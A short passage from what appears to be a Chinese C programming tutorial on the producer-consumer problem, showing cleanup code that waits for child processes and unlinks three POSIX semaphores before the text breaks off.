    while ((wait(&stat)) > 0);
    sem_unlink("empty");
    sem_unlink("full");
    sem_unlink("mutex");

    puts("all done");
    return 0;
}

最终效果如下: